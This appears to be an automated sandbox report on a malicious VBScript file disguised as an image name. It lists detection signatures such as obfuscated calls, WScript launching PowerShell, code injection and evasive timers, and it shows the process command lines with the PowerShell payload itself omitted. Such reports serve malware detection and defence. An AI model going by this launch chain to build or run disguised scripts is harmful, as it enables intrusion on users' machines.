Windows
Analysis Report
IMG_2022028022-0120.vbs
Overview
General Information
Detection
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
VBScript performs obfuscated calls to suspicious functions
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Abnormal high CPU Usage
Enables debug privileges
Classification
- System is w10x64
- wscript.exe (PID: 1048, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs", MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- powershell.exe (PID: 6032, cmdline:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = [obfuscated PowerShell payload omitted]